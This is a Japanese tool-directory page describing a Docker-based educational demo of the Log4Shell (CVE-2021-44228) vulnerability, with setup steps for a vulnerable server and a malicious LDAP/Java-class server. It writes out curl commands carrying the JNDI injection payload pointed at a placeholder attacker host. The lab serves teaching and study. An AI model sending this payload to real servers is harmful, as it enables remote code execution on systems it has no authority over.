Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/mschmnet/log4shell-demo
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubmschmnet/log4shell-demo

Log4Shell-demo

Log4Shell / CVE-2021-44228 の脆弱性がどのように動作するかを示すデモ

リポジトリを見る
714年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Log4Shell の動作

このプロジェクトは、Log4Shell / CVE-2021-44228 の脆弱性がどのように機能するかを実演することを目的としています。

必要条件

必要なのはDockerがインストールされていることだけです。理想的には、2つの異なる仮想マシンを用意してください。1つは 脆弱なサーバー 用で、もう1つは悪意のあるコードベースとLDAPサーバーをホストする 悪意のあるサーバー 用です。

オプションとして Make と Docker Compose をインストールしても構いませんが、このリポジトリには make.sh も含まれており、それらの要件をスキップしてDockerコンテナ内から使用できるため、これらは必須ではありません。

Docker のインストール(任意)

まだインストールしていない場合、Debian VMにDockerをインストールする手順は次のとおりです。次の手順を利用できます: https://gist.github.com/mschmnet/5d8c979920801c73e148c901a5989b46

リポジトリのダウンロード

root@kitploit:~
git clone [email protected]:mschmnet/Log4Shell-demo.git 

脆弱なサーバーのインストール

root@kitploit:~
cd vulnerable-server
../make.sh run # Or you coud execute make run if you hade Make and Docker Compose installed

悪意のあるサーバーの起動

これにより、悪意のあるJavaクラスを配信するための基本的なLDAPサーバーと基本的なPythonサーバーが起動します。

これらのサーバーが利用可能になるIPアドレスまたはドメイン名を指定する必要があります。

root@kitploit:~
cd malicious-server
../make.sh run CODEBASE_URL=SERVER_IP_OR_DOMAIN_NAME # Optionally make instead of ../make.sh if you had Make and Docker Compose installed

ターゲットサーバーを攻撃する方法

root@kitploit:~
curl -X GET -G --data-urlencode 'foo=${jndi:ldap://IP_OR_DOMAIN_MALICIOUS_SERVER:1389/a}' http://IP_OR_DOMAIN_VULNERABLE_SERVER/some-endpoint

または、単に

root@kitploit:~
curl --location --request GET 'http://IP_OR_DOMAIN_VULNERABLE_SERVER/some-endpoint?foo=%24%7Bjndi%3Aldap%3A%2F%2FIP_OR_DOMAIN_MALICIOUS_SERVER%3A1389%2Fa%7D'

ここで ${jndi:ldap://IP_OR_DOMAIN_MALICIOUS_SERVER:1389/a} は単にURLエンコードされているだけです。

各サーバーを停止する方法

root@kitploit:~
../make.sh stop

ログを表示する方法

root@kitploit:~
../make.sh logs 

スライド

https://raw.githubusercontent.com/mschmnet/Log4Shell-demo/main/pdf/slides.pdf

ツールをダウンロード